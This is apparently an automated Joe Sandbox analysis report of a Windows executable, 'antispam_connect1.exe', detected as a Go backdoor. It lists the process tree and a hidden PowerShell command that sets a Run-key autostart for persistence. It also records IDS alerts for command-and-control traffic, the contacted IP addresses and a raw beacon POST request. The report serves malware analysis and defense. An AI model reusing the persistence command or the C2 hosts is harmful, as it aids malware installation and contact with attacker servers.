Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
antispam_connect1.exe

Overview

General Information

Sample name:antispam_connect1.exe
Analysis ID:1533403
MD5:970c918fdde70fd4e57c0db74cb54be0
SHA1:b1296b7f95cab45b215704de26c8c8bd91cc83b5
SHA256:18cf24c3c90042ffdb9a96d415ad87d78dea4b47cef22e0ba52380de8225b8f0
Tags:exeuser-Racco42
Infos:

Detection

GO Backdoor
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Machine Learning detection for sample
Suspicious powershell command line found
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • antispam_connect1.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\antispam_connect1.exe" MD5: 970C918FDDE70FD4E57C0DB74CB54BE0)
    • powershell.exe (PID: 5420 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • antispam_connect1.exe (PID: 1600 cmdline: "C:\Users\user\Desktop\antispam_connect1.exe" MD5: 970C918FDDE70FD4E57C0DB74CB54BE0)
    • powershell.exe (PID: 5364 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • antispam_connect1.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\antispam_connect1.exe" MD5: 970C918FDDE70FD4E57C0DB74CB54BE0)
    • powershell.exe (PID: 6552 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: antispam_connect1.exe PID: 5024JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Process Memory Space: antispam_connect1.exe PID: 1600JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
      Process Memory Space: antispam_connect1.exe PID: 1900JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

        Sigma Signatures

        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\antispam_connect1.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5420, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\antispam_connect1.exe", ParentImage: C:\Users\user\Desktop\antispam_connect1.exe, ParentProcessId: 5024, ParentProcessName: antispam_connect1.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }", ProcessId: 5420, ProcessName: powershell.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-14T17:22:22.101463+020028555361A Network Trojan was detected192.168.2.549705109.172.88.3812658TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-14T17:22:51.459438+020028555371A Network Trojan was detected192.168.2.549705109.172.88.3812658TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-14T17:22:51.683092+020028555381A Network Trojan was detected109.172.88.3812658192.168.2.549705TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-14T17:22:22.101286+020028555391A Network Trojan was detected109.172.88.3812658192.168.2.549705TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Machine Learning detection for sample
        Source: antispam_connect1.exeJoe Sandbox ML: detected

        Compliance

        barindex
        Detected unpacking (creates a PE file in dynamic memory)
        Source: C:\Users\user\Desktop\antispam_connect1.exeUnpacked PE file: 0.2.antispam_connect1.exe.4120000.1.unpack
        Source: antispam_connect1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: antispam_connect1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.88.38:12658 -> 192.168.2.5:49705
        Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.5:49705 -> 109.172.88.38:12658
        Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.5:49705 -> 109.172.88.38:12658
        Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.88.38:12658 -> 192.168.2.5:49705
        Connects to many ports of the same IP (likely port scanning)
        Source: global trafficTCP traffic: 109.172.88.38 ports 1,2,12658,5,6,8
        Found Tor onion address
        Source: antispam_connect1.exe, 00000000.00000002.3373577368.0000000004120000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
        Source: antispam_connect1.exe, 00000005.00000002.3373058730.0000000003B00000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
        Source: antispam_connect1.exe, 00000008.00000002.3373123002.00000000037D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 109.172.88.38:12658
        Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
        Source: Joe Sandbox ViewIP Address: 93.185.159.253 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
        Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
        Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
        Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
        Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
        Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
        Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
        Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
        Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
        Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
        Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
        Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 154X-Api-Key: lu4b1kVSAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
        Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
        Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
        Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
        Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
        Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
        Source: antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91C:
        Source: antispam_connect1.exe, 00000000.00000002.3374772415.000000000D042000.00000004.00001000.00020000.00000000.sdmp, antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91http://46.8.232.106
        Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
        Source: powershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2178335062.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
        Source: powershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
        Source: powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000009.00000002.2415769151.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
        Source: powershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 0_2_036D68A10_2_036D68A1
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 5_2_030B68A15_2_030B68A1
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 8_2_02D868A18_2_02D868A1
        Source: antispam_connect1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal84.troj.evad.winEXE@12/8@0/6
        Source: C:\Users\user\Desktop\antispam_connect1.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hhxmqpo.0qh.ps1Jump to behavior
        Source: antispam_connect1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\antispam_connect1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeFile read: C:\Users\user\Desktop\antispam_connect1.exeJump to behavior
